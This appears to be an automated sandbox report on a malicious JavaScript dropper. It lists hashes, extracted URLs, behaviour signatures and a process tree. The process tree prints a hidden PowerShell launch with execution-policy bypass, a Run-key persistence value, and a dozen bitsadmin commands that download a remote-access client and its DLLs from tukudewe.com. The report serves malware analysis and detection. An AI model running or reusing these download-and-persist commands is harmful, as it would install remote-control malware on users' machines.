Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
25-08-2023 13:59
Static task
static1
Behavioral task
behavioral1
Sample
933861b75227a3f4727b5872fa9da1b049e420632f8a9198987e8bfbaf7da9e6_JC.js
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
933861b75227a3f4727b5872fa9da1b049e420632f8a9198987e8bfbaf7da9e6_JC.js
Resource
win10v2004-20230703-en
General
-
Target
933861b75227a3f4727b5872fa9da1b049e420632f8a9198987e8bfbaf7da9e6_JC.js
-
Size
37KB
-
MD5
c15beea0035b0ac586f27895a29a04f4
-
SHA1
937d9d8eaac5a6ef16ce8bcae4b084a3603a49a3
-
SHA256
933861b75227a3f4727b5872fa9da1b049e420632f8a9198987e8bfbaf7da9e6
-
SHA512
ecbf688b91157e375fff3fa0b6d001a80e69d1a11d9467f38dbcab08714f87564cfcbaf49ab8637010db2c2974b73f863f39856d10cd6275abd4f1873e0d0145
-
SSDEEP
768:r4mmlLumMT+Sh5+nyZcUtu/tWnm8raemrwzyWM6j:0mmlLg7hdtwWnzraemrcMw
Malware Config
Extracted
https://tukudewe.com/js/01b1v2g3.zip
https://tukudewe.com/js/h3b2_jsg/
Signatures
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000\Software\Microsoft\Windows\CurrentVersion\Run\MsEdgeSandbox = "C:\\Users\\Admin\\AppData\\Roaming\\MsEdgeSandbox\\client32.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Download via BitsAdmin 1 TTPs 12 IoCs
pid Process 2352 bitsadmin.exe 1456 bitsadmin.exe 2788 bitsadmin.exe 568 bitsadmin.exe 3020 bitsadmin.exe 2288 bitsadmin.exe 2992 bitsadmin.exe 2988 bitsadmin.exe 808 bitsadmin.exe 2712 bitsadmin.exe 2256 bitsadmin.exe 2172 bitsadmin.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2860 powershell.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 1988 wrote to memory of 2860 1988 wscript.exe 28 PID 1988 wrote to memory of 2860 1988 wscript.exe 28 PID 1988 wrote to memory of 2860 1988 wscript.exe 28 PID 2860 wrote to memory of 2988 2860 powershell.exe 30 PID 2860 wrote to memory of 2988 2860 powershell.exe 30 PID 2860 wrote to memory of 2988 2860 powershell.exe 30 PID 2860 wrote to memory of 808 2860 powershell.exe 31 PID 2860 wrote to memory of 808 2860 powershell.exe 31 PID 2860 wrote to memory of 808 2860 powershell.exe 31 PID 2860 wrote to memory of 2712 2860 powershell.exe 32 PID 2860 wrote to memory of 2712 2860 powershell.exe 32 PID 2860 wrote to memory of 2712 2860 powershell.exe 32 PID 2860 wrote to memory of 2788 2860 powershell.exe 33 PID 2860 wrote to memory of 2788 2860 powershell.exe 33 PID 2860 wrote to memory of 2788 2860 powershell.exe 33 PID 2860 wrote to memory of 568 2860 powershell.exe 36 PID 2860 wrote to memory of 568 2860 powershell.exe 36 PID 2860 wrote to memory of 568 2860 powershell.exe 36 PID 2860 wrote to memory of 3020 2860 powershell.exe 37 PID 2860 wrote to memory of 3020 2860 powershell.exe 37 PID 2860 wrote to memory of 3020 2860 powershell.exe 37 PID 2860 wrote to memory of 2288 2860 powershell.exe 38 PID 2860 wrote to memory of 2288 2860 powershell.exe 38 PID 2860 wrote to memory of 2288 2860 powershell.exe 38 PID 2860 wrote to memory of 2352 2860 powershell.exe 39 PID 2860 wrote to memory of 2352 2860 powershell.exe 39 PID 2860 wrote to memory of 2352 2860 powershell.exe 39 PID 2860 wrote to memory of 1456 2860 powershell.exe 40 PID 2860 wrote to memory of 1456 2860 powershell.exe 40 PID 2860 wrote to memory of 1456 2860 powershell.exe 40 PID 2860 wrote to memory of 2992 2860 powershell.exe 41 PID 2860 wrote to memory of 2992 2860 powershell.exe 41 PID 2860 wrote to memory of 2992 2860 powershell.exe 41 PID 2860 wrote to memory of 2256 2860 powershell.exe 42 PID 2860 wrote to memory of 2256 2860 powershell.exe 42 PID 2860 wrote to memory of 2256 2860 powershell.exe 42 PID 2860 wrote to memory of 2172 2860 powershell.exe 43 PID 2860 wrote to memory of 2172 2860 powershell.exe 43 PID 2860 wrote to memory of 2172 2860 powershell.exe 43
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\933861b75227a3f4727b5872fa9da1b049e420632f8a9198987e8bfbaf7da9e6_JC.js1⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Roaming\qlp37v2.ps12⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/AudioCapture.dll C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\AudioCapture.dll3⤵
- Download via BitsAdmin
PID:2988
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/client32.exe C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\client32.exe3⤵
- Download via BitsAdmin
PID:808
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/client32.ini C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\client32.ini3⤵
- Download via BitsAdmin
PID:2712
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/HTCTL32.DLL C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\HTCTL32.DLL3⤵
- Download via BitsAdmin
PID:2788
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/msvcr100.dll C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\msvcr100.dll3⤵
- Download via BitsAdmin
PID:568
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/nskbfltr.inf C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\nskbfltr.inf3⤵
- Download via BitsAdmin
PID:3020
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/NSM.LIC C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\NSM.LIC3⤵
- Download via BitsAdmin
PID:2288
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/pcicapi.dll C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\pcicapi.dll3⤵
- Download via BitsAdmin
PID:2352
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/PCICHEK.DLL C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\PCICHEK.DLL3⤵
- Download via BitsAdmin
PID:1456
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/PCICL32.DLL C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\PCICL32.DLL3⤵
- Download via BitsAdmin
PID:2992
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/remcmdstub.exe C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\remcmdstub.exe3⤵
- Download via BitsAdmin
PID:2256
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/TCCTL32.DLL C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\TCCTL32.DLL3⤵
- Download via BitsAdmin
PID:2172
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5900df524f9233924d73694b5d1a4796e
SHA10f39bb7dd04aa79b118694e6d59a5408aa72c724
SHA256d036c7ce56f45a2d1c9602bac0ffe66fcf70f618fa39852c13108550bbc1af3d
SHA51212fb44e3112032112d1e017a15c2a49c34946d6135722bccc7e7a3c67e3324a3374ae66fb4df6b2e1108b0c409a32a8cc60997d4c18f6e63f9dc51b1eba2735b